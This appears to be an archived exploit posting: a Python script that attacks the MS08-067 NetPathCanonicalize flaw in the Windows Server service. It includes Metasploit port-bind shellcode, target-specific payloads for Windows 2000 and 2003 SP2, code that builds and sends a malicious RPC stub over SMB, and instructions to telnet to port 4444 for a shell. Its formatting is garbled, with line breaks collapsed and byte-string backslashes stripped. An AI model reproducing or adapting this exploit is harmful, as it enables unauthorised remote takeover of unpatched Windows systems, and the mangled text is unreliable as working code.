ms08067-2k2k3.txt
Posted on 16 November 2008
#!/usr/bin/env python ############################################################################# # MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) # www.hackingspirits.com # www.coffeeandsecurity.com # Email: d3basis.m0hanty @ gmail.com ############################################################################# import struct import sys from threading import Thread #Thread is imported incase you would like to modify #the src to run against multiple targets. try: from impacket import smb from impacket import uuid from impacket.dcerpc import dcerpc from impacket.dcerpc import transport except ImportError, _: print 'Install the following library to make this script work' print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' sys.exit(1) print '#######################################################################' print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)' print '# www.hackingspirits.com' print '# www.coffeeandsecurity.com' print '# Email: d3basis.m0hanty @ gmail.com' print '####################################################################### ' #Portbind shellcode from metasploit; Binds port to TCP port 4444 shellcode = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" shellcode += "x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9" shellcode += "x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56" shellcode += "x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22" shellcode += "xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30" shellcode += "x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81" shellcode += "x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42" shellcode += "xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22" shellcode += "xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9" shellcode += "x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79" shellcode += "x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab" shellcode += "xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa" shellcode += "xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48" shellcode += "x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1" shellcode += "x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0" shellcode += "xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe" shellcode += "x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9" shellcode += "xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84" shellcode += "x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56" shellcode += "x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8" shellcode += "x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79" shellcode += "x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6" shellcode += "xbaxb5x60x56x39x4axb6xa9" #Payload for Windows 2000 target payload_1='x41x00x5cx00x2ex00x2ex00x5cx00x2ex00x2ex00x5cx00' payload_1+='x41x41x41x41x41x41x41x41' payload_1+='x41x41x41x41x41x41x41x41' payload_1+='x41x41' payload_1+='x2fx68x18x00x8bxc4x66x05x94x04x8bx00xffxe0' payload_1+='x43x43x43x43x43x43x43x43' payload_1+='x43x43x43x43x43x43x43x43' payload_1+='x43x43x43x43x43x43x43x43' payload_1+='x43x43x43x43x43x43x43x43' payload_1+='x43x43x43x43x43x43x43x43' payload_1+='xebxcc' payload_1+='x00x00' #Payload for Windows 2003[SP2] target payload_2='x41x00x5cx00' payload_2+='x2ex00x2ex00x5cx00x2ex00' payload_2+='x2ex00x5cx00x0ax32xbbx77' payload_2+='x8bxc4x66x05x60x04x8bx00' payload_2+='x50xffxd6xffxe0x42x84xae' payload_2+='xbbx77xffxffxffxffx01x00' payload_2+='x01x00x01x00x01x00x43x43' payload_2+='x43x43x37x48xbbx77xf5xff' payload_2+='xffxffxd1x29xbcx77xf4x75' payload_2+='xbdx77x44x44x44x44x9exf5' payload_2+='xbbx77x54x13xbfx77x37xc6' payload_2+='xbax77xf9x75xbdx77x00x00' if sys.argv[2]=='1': #Windows 2000 Payload payload=payload_1 print '[-]Windows 2000 payload loaded' if sys.argv[2]=='2': #Windows 2003[SP2] Payload payload=payload_2 print '[-]Windows 2003[SP2] payload loaded' class SRVSVC_Exploit(Thread): def __init__(self, target, osver, port=445): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target self.osver = osver def __DCEPacket(self): print '[-]Initiating connection' self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\pipe\browser]' % self.target) self.__trans.connect() print '[-]connected to ncacn_np:%s[\pipe\browser]' % self.target self.__dce = self.__trans.DCERPC_class(self.__trans) self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) # Constructing Malicious Packet self.__stub='x01x00x00x00' self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00' self.__stub+=shellcode self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x41x41x41x41x41x41x41x41' self.__stub+='x00x00x00x00' self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00' self.__stub+=payload self.__stub+='x00x00x00x00' self.__stub+='x02x00x00x00x02x00x00x00' self.__stub+='x00x00x00x00x02x00x00x00' self.__stub+='x5cx00x00x00x01x00x00x00' self.__stub+='x01x00x00x00' return def run(self): self.__DCEPacket() self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation print '[-]Exploit sent to target successfully... [1]Telnet to port 4444 on target machine...' if __name__ == '__main__': try: target = sys.argv[1] osver = sys.argv[2] except IndexError: print ' Usage: %s <target ip> <os version> ' % sys.argv[0] print 'Example: srvsvcexpl.py 192.168.1.1 2 ' print 'Select OS Version' print '[-]Windows 2000: OS Version = 1' print '[-]Windows 2003[SP2]: OS Version = 2' sys.exit(-1) current = SRVSVC_Exploit(target, osver) current.start() #print '[-]Exploit sent to target successfully... [-]Telnet to port 4444 on target machine...'
